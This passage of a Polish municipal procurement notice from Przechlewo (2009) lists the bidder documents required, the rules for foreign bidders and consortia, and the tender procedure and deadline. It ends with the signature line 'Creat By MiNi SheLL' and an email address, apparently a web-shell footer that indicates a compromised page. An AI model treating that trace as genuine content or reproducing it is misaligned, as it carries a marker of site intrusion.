       g)     Wykaz osób upoważnionych do reprezentowania Wykonawcy i składania oświadczeń
   woli;
       h)  Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia    postępowania o  udzielenie  zamówienia,  a  jeżeli  okres  prowadzenia działalności  jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane z należytą starannością - referencje -  Załącznik nr 3 do SIWZ
       i)    Wykaz  osób,	którymi  dysponuje lub  będzie  dysponował Wykonawca i  które będą uczestniczyć   w   wykonywaniu   zamówienia,   wraz   z   informacjami   na   temat   ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności -  Załącznik nr 4 do SIWZ. Do wykazu należy dołączyć dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, wymagane decyzje o nadaniu uprawnień , aktualne zaświadczenia o przynależności do właściwej terenowo izby inżynierów oraz dokumenty potwierdzające min. 5 letnie doświadczenie zawodowe- życiorys zawodowy z wyszczególnieniem miejsca oraz okresu zatrudnienia i  pełnionych  funkcji. 
    j)  Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do    wykonania zamówienia, jeżeli  w wykazie, o którym mowa pkt 10 lit  i  niniejszej specyfikacji, wykonawca wskazał osoby, którymi będzie dysponować;
k)  Wykaz	podmiotów,	które	będą	uczestniczyć	w	wykonywaniu	zamówienia.
 U waga:
        Wykaz  składają  tylko  Wykonawcy,  którzy  zamierzają  powierzyć  wykonanie części   zamówienia podwykonawcom.
        W wykazie podmiotów należy wskazać podmiot oraz opisać zakres zamówienia, które  Wykonawca zamierza powierzyć podwykonawcy.
 l)   Dowód wniesienia wadium;
 m)  zaakceptowane projekty umów - załącznik nr 5 
 n)   wyceniony wykaz usług- załącznik nr 7 do SIWZ
    o)   dokumenty  określające obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe - obroty na  kwotę  co najmniej 300 000,00 zł., a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres  
    p) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności na kwotę 500.000 złotych.    

10.1. Wymienione w   niniejszej SIWZ dokumenty powinny być  oryginałami albo  kopiami potwierdzonymi za zgodność z oryginałem przez upoważnionych przedstawicieli Wykonawcy. Jeżeli Wykonawca składa dokumenty takie jak wypis z rejestru i informacja z rejestru karnego powinny posiadać aktualną datę ważności, co najmniej do dnia złożenia ofert, a w przypadku jej braku data wystawienia lub aktualizacji dokumentu nie może być wcześniejsza  niż  6  miesięcy  od  daty  składania  ofert  określonej  w  niniejszej  SIWZ. W przypadku	zaświadczenia	z	Urzędu	Skarbowego,	zaświadczenia	z	Zakładu Ubezpieczeń  Społecznych,  ich  data  wystawienia  nie  może  być  wcześniejsza  niż  3 miesiące od daty składania ofert określonej w pkt. 12 SIWZ.

10.2. Zamawiający, w trybie art.26 ust. 3, wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych oświadczeń, dokumentów lub złożyli dokumenty zawierające błędy do ich uzupełnienia w wyznaczonym terminie.
10.3. Brak jakiegokolwiek z  wyżej wymienionych dokumentów lub złożenie dokumentu w niewłaściwej formie  (kopia dokumentu nie poświadczona za  zgodność z  oryginałem) spowoduje wykluczenie Wykonawcy z postępowania lub odrzucenie oferty.

10.4.	Jeżeli	Wykonawca	ma	siedzibę	lub	miejsce	zamieszkania	poza	terytorium
Rzeczypospolitej Polskiej:
zamiast dokumentów, o których mowa w pkt 10 lit. a, b, c, e składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
nie  orzeczono  wobec  niego  zakazu  ubiegania  się  o  zamówienia  publiczne  - dokument  wystawiony nie  wcześniej  niż  6  miesięcy  przed  upływem terminu składania ofert;
nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i 

zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na  raty  zaległych  płatności  lub  wstrzymanie w  całości  wykonania decyzji właściwego organu - dokument wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert;
zamiast dokumentów, o których mowa w pkt 10 lit. d składa zaświadczenie właściwego organu sądowe lub administracyjnego kraju pochodzenia lub zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w artykule 24 ust. 1 pkt 4 - 8 ustawy Prawo Zamówień Publicznych - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

10.5. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 10.4, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

10.6. Uczestnicy konsorcjum lub  spółki cywilnej, zwani  dalej  wykonawcami wspólnymi , każdy oddzielnie, nie mogą podlegać wykluczeniu z postępowania na podstawie art. 24, a także muszą spełniać wymogi, oraz łącznie warunki, o których mowa w art. 22 ust. 1 pkt
1-3 ustawy. W celu potwierdzenia spełniania ww. warunków każdy wykonawca wspólny
winien złożyć:

-	oświadczenia, o których mowa w  pkt 10 lit. f  specyfikacji. Wykonawcy wspólni spełnią ten warunek, jeżeli zostanie on spełniony przez każdego z nich,

-	dokumenty, o których mowa w pkt 10 lit. a,b,c,d,e specyfikacji. Wykonawcy wspólni spełnią ten warunek, jeżeli zostanie on spełniony przez każdego z nich,

-	wykaz osób, o którym mowa w pkt 10 lit. i specyfikacji. Wykonawcy wspólni spełnią ten warunek, jeżeli z przedłożonych wykazów będzie wynikało, że łącznie zatrudniają (dysponują) osobami w liczbie i specjalnościach wymienionych w pkt 9. specyfikacji,

-	wykaz podmiotów, o którym mowa w pkt 10 lit. k specyfikacji, składany tylko wtedy, gdy	wykonawcy	wspólni	zamierzają	przy	realizacji	przedmiotu	zamówienia zaangażować podwykonawców. Warunek będzie przez zamawiającego uznany za spełniony, jeżeli  wykaz zostanie  podpisany przez  konsorcjum lub  spółkę  cywilną stosownie do zasady reprezentacji albo pełnomocnika, o którym mowa w art. 23 ust. 2 ustawy - stosownie do zakresu umocowania.
-	wykaz wykonanych usług, o którym mowa w pkt 10 lit. h specyfikacji. Wykonawcy wspólni spełnią ten warunek, jeżeli z przedłożonych wykazów będzie wynikało, że co najmniej  jeden  z  nich  (lub  wszyscy  wspólnie)  wykonał  w  żądanym  terminie  co najmniej dwie odpowiadające swoim rodzajem i wartością usługi, a wszystkie wymienione w wykazach usługi zostały wykonane należycie - co winno być potwierdzone stosownymi dokumentami dołączonymi do wykazów,


10.7. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z przetargu na każdym jego etapie, zgodnie z dyspozycją art. 24 ust. 2 pkt 2 ustawy. Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 kodeksu karnego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> htpp://bip.przechlewo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Przechlewo, ul. Człuchowska 26, 77-320 Przechlewo..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 13:00, miejsce: Urząd Gminy Przechlewo, ul. Człuchowska 26, 77-320 Przechlewo.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com